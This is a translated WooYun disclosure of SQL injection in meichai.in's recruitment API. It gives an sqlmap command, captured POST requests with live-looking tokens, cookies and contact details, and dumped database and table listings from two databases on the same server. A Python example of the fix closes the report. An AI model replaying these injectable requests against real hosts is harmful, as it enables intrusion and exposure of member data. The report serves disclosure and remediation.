Vulnerability summary

Defect ID: wooyun-2016-0208764

Title: Meichai Recruitment bundled SQL injections exposing 57w (570,000) member records via cross-database query (Kuaitui apparently shares the same database server)

Vendor: meichai.in

Author: 黑色键盘丶

Submitted: 2016-05-18 18:26

Fix time: 2016-07-02 19:50

Published: 2016-07-02 19:50

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org, for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2016-05-18: Details reported to the vendor, awaiting vendor handling
2016-05-18: Vendor confirmed; details visible to the vendor only
2016-05-28: Details opened to core white hats and domain experts
2016-06-07: Details opened to regular white hats
2016-06-17: Details opened to intern white hats
2016-07-02: Details opened to the public

Brief description:

See title.

Detailed description:

sqlmap.py -r 1.txt --dbs
--------------------------------- POST packet ---------- _token parameter ----------
POST /point/exchangegoods HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
Host: api.meichai.in
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/2.5.0
_appid=1001&_token=UTQmHK731469156255404032&_ts=1463230915613&_sn=d6e8756de72a7dddcf3bfb1f37d63869&goodsid=1&orderqty=1


Databases
back-end DBMS: MySQL 5.0
available databases [6]:
[*] blogrdt
[*] information_schema
[*] kuaitui
[*] meichai
[*] mysql
[*] test


Tables in the current database
Database: meichai
+--------------------------+---------+
| Table | Entries |
+--------------------------+---------+
| sys_infcall | 8312577 |
| sys_applog | 7809269 |
| cbd_searchhist | 1811749 |
| cbd_assignhist | 1346284 |
| cbd_objevent | 711765 |
| cbd_memo | 574367 |
| acc_user | 572579 |
| acc_userlog | 572570 |
| bill_user | 572108 |
| cbd_statushist | 549533 |
| sys_inflog | 541664 |
| acc_userverify | 524598 |
| acc_userbasic | 524597 |
| bill_userpointtrans | 377614 |
| acc_peaccesslog | 361723 |
| cbd_projeventcount | 333766 |
| cbd_projevent | 329131 |
| cbd_projeventbr | 314445 |
| cbd_objtag | 288710 |
| cbd_msglist | 258346 |
| acc_userbind | 256886 |
| cbd_projeventjob | 250898 |
| acc_session | 238229 |
| sys_kv | 208622 |
| sys_appdownlog | 200446 |
| acc_userwant | 196105 |
| acc_usercontact | 188418 |
| cbd_mobileverify | 182141 |
| acc_userwantfunc | 179698 |
| acc_accesslog | 165739 |
| cbd_message | 157605 |
| cbd_projeventcontact | 154800 |
| cbd_assign | 142311 |
| acc_userwantarea | 135628 |
| acc_session_copy | 123815 |
| cbd_companyaddr | 120026 |
| sys_actcode | 112155 |
| zmobiletemp1 | 112083 |
| cbd_projeventbrcontact | 108219 |
| cbd_ordergoods | 102329 |
| cbd_orderhead | 102329 |
| cbd_userpointtask | 82780 |
| sms_sendqueue | 65537 |
| sms_phonedetail | 64551 |
| cbd_companycontact | 63183 |
| acc_userrate | 55394 |
| bill_userpoint | 53510 |
| acc_staffbasic | 47526 |
| cbd_company | 47175 |
| cbd_projrecom | 43514 |
| cbd_file | 37318 |
| cbd_objfile | 36105 |
| bill_usertrans | 33633 |
| cbd_todo | 32554 |
| bill_userpointbak | 31268 |
| acc_sharelog | 27488 |
| cbd_project | 26702 |
| t2 | 18695 |
| cbd_companyextra | 17739 |
| bill_kttrans | 16715 |
| sys_statkv | 14815 |
| bill_usertrans8 | 13636 |
| cbd_companycommentreply | 11772 |
| cbd_pushqueue2 | 11440 |
| cbd_job | 7275 |
| cbd_apply | 7024 |
| cbd_companysalarydet | 6973 |
| bill_companytrans8 | 6884 |
| cbd_apply8 | 6818 |
| cbd_exchangecode | 6161 |
| cbd_companycommentreward | 5903 |
| cbd_payqueuelog | 5897 |
| cbd_companycommentlike | 5819 |
| cbd_payqueue | 5690 |
| sys_huaming | 4500 |
| sys_nuoyaarea | 3512 |
| sys_area | 3326 |
| sys_bizarea | 3282 |
| cbd_userlotstat | 2678 |
| cbd_exportlog | 2645 |
| cbd_nuoyaverify | 2543 |
| acc_usermobile8 | 2433 |
| cbd_userexchangehist | 2359 |
| adv_applog | 2326 |
| acc_userbank8 | 2241 |
| t1 | 2166 |
| acc_usercompany8 | 2148 |
| acc_user8 | 2128 |
| acc_userset8 | 2128 |
| bill_user8 | 2128 |
| cbd_cv | 1541 |
| cbd_projrecomdet | 1531 |
| sys_industryfunc | 1321 |
| cbd_companysalaryreport | 1250 |
| sys_feedback | 1179 |
| cbd_companycomment | 1159 |
| cbd_companycommentstat | 1159 |
| sys_bankcardmap | 1085 |
| agent_invite_member | 930 |
| cbd_projeventprom | 918 |
| cbd_companyrate | 819 |
| cbd_companysalarylevel | 811 |
| sys_gencode | 690 |
| sys_funcsalary | 567 |
| cbd_action | 410 |
| sys_metro | 380 |
| cbd_channelimport | 334 |
| acc_userbank | 259 |
| cbd_companyimport | 247 |
| sys_applogdic | 217 |
| sys_function | 214 |
| zmobiletemp2 | 198 |
| cbd_actioncount | 197 |
| sys_menu | 184 |
| cbd_projeventreport | 182 |
| sys_menu111 | 148 |
| cbd_companysalaryimport | 124 |
| cbd_jobhist | 120 |
| cbd_projeventtime | 119 |
| sys_industry | 101 |
| cbd_pushqueue | 96 |
| cbd_companysalary | 92 |
| acc_userset | 87 |
| cbd_talentpool | 82 |
| cbd_qrcode | 79 |
| sys_template | 74 |
| acc_roleresource | 65 |
| sys_ids3 | 64 |
| bill_kttrans8 | 56 |
| sys_appversion | 47 |
| sys_option | 46 |
| sys_menu2 | 42 |
| cbd_citytag | 40 |
| sys_menu3 | 35 |
| sys_areamap | 31 |
| acc_qrlog | 26 |
| sys_ids | 24 |
| sys_partfunction | 21 |
| acc_userpush8 | 20 |
| cbd_recom | 19 |
| sys_bankmap | 18 |
| sys_nuoyabank | 18 |
| acc_session8 | 17 |
| bill_company8 | 17 |
| cbd_companypayset | 17 |
| acc_role | 15 |
| acc_userwork | 15 |
| cbd_companycommentreport | 15 |
| sys_ids2 | 14 |
| cbd_companygencode | 12 |
| sys_wblist | 12 |
| cbd_pointrule | 10 |
| acc_userpush | 8 |
| cbd_branchservice | 8 |
| cbd_goods | 8 |
| cbd_mcservice | 8 |
| cbd_pointtask | 8 |
| cbd_companyapp | 6 |
| sms_batch | 5 |
| sms_theme | 5 |
| sms_sendrecord | 4 |
| adv_schedule | 2 |
| adv_scheduledetail | 2 |
| cbd_projsalary | 2 |
| sys_term | 2 |
| adv_client | 1 |
| adv_place | 1 |
| bill_kt | 1 |
| bill_kt8 | 1 |
| cbd_activitytheme | 1 |
+--------------------------+---------+


Cross-database query
Database: kuaitui
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| acc_user | 280989 |
| bill_user | 280589 |
| acc_accesslog | 269991 |
| acc_userbind | 263773 |
| acc_wxid | 225985 |
| cbd_mycv | 115814 |
| cbd_wxforward | 92318 |
| sha_postmeta | 17683 |
| sha_posts | 11836 |
| sha_term_relationships | 7933 |
| acc_sharelog | 7102 |
| sys_kv | 6294 |
| cbd_jobop | 5800 |
| sys_inflog | 4423 |
| cbd_qrcode | 3164 |
| bill_usertrans | 2629 |
| sha_term_taxonomy | 2432 |
| sha_terms | 2426 |
| cbd_cvdef | 1973 |
| cbd_job | 1919 |
| cbd_assignjob | 1893 |
| cbd_myfav | 1565 |
| cbd_cvop | 1205 |
| cbd_column | 838 |
| cbd_cv | 745 |
| acc_userlog | 597 |
| cbd_cvdef_copy | 594 |
| cbd_site | 530 |
| acc_invitecode | 516 |
| cbd_qrcode_copy | 460 |
| acc_applyinvite | 412 |
| cbd_companyuser | 352 |
| bill_company | 342 |
| cbd_company | 336 |
| cbd_sitecover | 290 |
| acc_userbind2 | 260 |
| cbd_promotion | 259 |
| cbd_companyextra | 258 |
| acc_actcode | 247 |
| sys_statkv | 216 |
| sha_options | 187 |
| bill_kttrans | 179 |
| cbd_jobcv | 173 |
| cbd_chmember | 172 |
| cbd_client | 154 |
| cbd_companycert | 143 |
| bill_companytrans | 138 |
| cbd_hunter | 111 |
| cbd_executive | 104 |
| cbd_filter | 72 |
| cbd_chcom | 70 |
| cbd_columnjob | 47 |
| cbd_eventcover | 46 |
| cbd_eventjob | 46 |
| cbd_job_copy | 46 |
| bill_invinfo | 36 |
| cbd_chmemapply | 33 |
| sha_usermeta | 25 |
| sys_template | 23 |
| cbd_event | 21 |
| cbd_channel | 19 |
| cbd_companyopt | 18 |
| sys_option | 16 |
| cbd_jobrefer | 15 |
| cbd_cvmemo | 13 |
| sys_ids | 12 |
| sys_file | 11 |
| bill_cashapply | 8 |
| bill_invapply | 5 |
| cbd_eventpromotion | 4 |
| acc_subinvite | 3 |
| cbd_chmemlevel | 2 |
| bill_kt | 1 |
| opc_user | 1 |
| sha_users | 1 |
| sys_fileextra | 1 |
+------------------------+---------+


------------- POST packet -------------
POST /api/company/savecontact HTTP/1.1
Host: biz.meichai.in
Proxy-Connection: keep-alive
Content-Length: 260
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://biz.meichai.in
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://biz.meichai.in/ring/page?_token=9LxQYm731482319550025728
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=9D33EE9FF34B086A5DF91D905E0B531A; JSESSIONID=7D5A93876EA2D617760AEAF093034E4E
id=63752&company=200029965&companyname=snake123&type=1&name=%E9%BB%91%E8%89%B2%E9%94%AE%E7%9B%98&sex=%E5%A5%B3&position=11111&phone=11111&mobile=13566641461&fax=111&email=313173917%40qq.com&random=0.33943755459040403&_appid=2001&_token=9LxQYm731482319550025728
--------------------------------------------- parameter sextype ---------
POST /api/resume/findtalentpools HTTP/1.1
Host: biz.meichai.in
Proxy-Connection: keep-alive
Content-Length: 315
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://biz.meichai.in
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://biz.meichai.in/ring/main?_appid=&_token=9LxQYm731482319550025728&_ts=1463233935659
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=9D33EE9FF34B086A5DF91D905E0B531A; JSESSIONID=7D5A93876EA2D617760AEAF093034E4E
mode=1&wantarea1=0&wantarea2=0&wantarea=0&wantfunc1=0&wantfunc=0&jobseekstatus=0&sextype=%E5%85%A8%E9%83%A8&expryear=%E4%B8%8D%E9%99%90&degree=%E4%B8%8D%E9%99%90&minage=1&maxage=1&minsalary=1&maxsalary=111&username=1111&mobile=11&page=1&count=25&random=0.1719370405189693&_appid=2001&_token=9LxQYm731482319550025728


Proof of vulnerability:

Fix recommendation:

Filter input.
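The one-word fix above ("filter") is under-specified, so here is an added example of what it should mean in practice for a lookup like the `_token` parameter in the first captured request. This is not the vendor's code: the table name acc_session comes from the report's table listing, but the column names, the token format and the in-memory SQLite stand-in are assumptions constructed for the demonstration. The unsafe function reproduces the defect class (the request parameter spliced into SQL text); the safe one binds the value as a parameter and adds an allow-list check in front of it.

```python
import re
import sqlite3

# Constructed sample rows for an in-memory stand-in of the session table.
# The table name acc_session is from the report; the columns are assumed.
SAMPLE_SESSIONS = [
    ("tokAlice001", 1),
    ("tokBob002", 2),
    ("tokCarol003", 3),
]

# Assumed token format: the tokens in the captured requests are 24 alphanumeric
# characters. The upper length bound is a guess, not the vendor's real rule.
TOKEN_RE = re.compile(r"[A-Za-z0-9]{1,64}")


def build_db():
    """Create and populate the constructed in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE acc_session (token TEXT NOT NULL, userid INTEGER NOT NULL)"
    )
    conn.executemany("INSERT INTO acc_session VALUES (?, ?)", SAMPLE_SESSIONS)
    conn.commit()
    return conn


def lookup_session_unsafe(conn, token):
    """The defect class in the report: the _token value is spliced into the SQL
    text, so quote characters in the parameter rewrite the query instead of
    being compared as data."""
    sql = "SELECT userid FROM acc_session WHERE token = '" + token + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_session_safe(conn, token):
    """Hardened form: the value travels as a bound parameter and can only ever be
    compared against the column, never parsed as SQL."""
    sql = "SELECT userid FROM acc_session WHERE token = ?"
    return [row[0] for row in conn.execute(sql, (token,))]


def is_well_formed_token(token):
    """Allow-list check applied before any query. Defence in depth only; it is
    not a substitute for the bound parameter."""
    return TOKEN_RE.fullmatch(token) is not None


def resolve_session(conn, token):
    """What the endpoint handler should do: reject malformed tokens outright,
    then look the rest up with a bound parameter. Returns a userid or None."""
    if not is_well_formed_token(token):
        return None
    rows = lookup_session_safe(conn, token)
    return rows[0] if rows else None


def unsafe_query_breaks_on(conn, token):
    """True when the concatenated query does not even parse for this input: an
    ordinary apostrophe in user data is enough to produce a database error,
    which is the symptom that reveals this bug class. The safe lookup has no
    such failure mode."""
    try:
        lookup_session_unsafe(conn, token)
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = build_db()
    probe = "x' OR '1'='1"
    # Unsafe: the WHERE clause was rewritten, so every userid comes back.
    print("unsafe:", lookup_session_unsafe(db, probe))
    # Safe: no row has that literal token, so nothing comes back.
    print("safe:  ", lookup_session_safe(db, probe))
    print("handler:", resolve_session(db, "tokBob002"))
```

The point of the pairing is the contrast on the same input: a value containing a quote makes the concatenated query either fail or match every row, while the parameterised query treats it as an unremarkable string that matches nothing. The allow-list check in resolve_session is there so that malformed tokens never reach the database at all, which also keeps them out of the error logs.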

Copyright notice: please credit 黑色键盘丶@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2016-05-18 19:48

Vendor reply:

Thanks to the submitter

Latest status:

None yet


Vulnerability comments:

Comments

  1. 2016-05-16 12:41 | 爱偷懒的98 ( Regular white hat | Rank:154 Vulnerabilities:52 | Back then carriages and mail were slow, and a lifetime was only enough to love one person. )

    Another cross-database one.